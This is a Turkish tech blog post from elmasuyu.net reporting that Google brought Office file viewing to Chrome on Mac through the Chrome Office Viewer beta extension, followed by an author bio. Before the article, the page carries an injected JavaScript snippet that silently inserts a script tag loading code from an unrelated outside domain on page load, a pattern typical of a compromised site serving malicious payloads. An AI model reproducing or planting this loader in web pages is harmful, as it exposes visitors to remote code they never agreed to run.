;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Google’dan Chrome için Office Dosyalar Desteği - elmasuyu.net
Kategoriler
Genel

Google’dan Chrome için Office Dosyalar Desteği

Google öncelikli olarak sadece Chromebook kullanıcılarının yararlanabildiği Microsoft Office dosyalarını açabilme yeteneğini Chrome’un Mac sürümüne ekledi. Şu an için Chrome’un en son Beta sürümü ve Chrome Office Viewer (Beta) eklentisi ile çalışabilen bu özellik ileride Chrome’un sabit sürümlerinde de kullanılır hale gelecek. Bu eklentinin en önemli özelliklerinden biri sadece size zaman kazandırması değil, aynı zamanda Sandbox özelliği ile Office dosyaları ile gelen zararlı yazılımları da önleyebiliyor olmasıdır. Bu sayede Office dosyaları ile gelen ve sizin bilgilerinizi çalmaya yeltenen dosyalar kontrollü bir şekilde açılabiliyor. Siz de bir Chrome kullanıcısıysanız ve dosyalarınızın güvenliğini düşünüyorsanız, bu eklentiyi tavsiye ederiz.

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner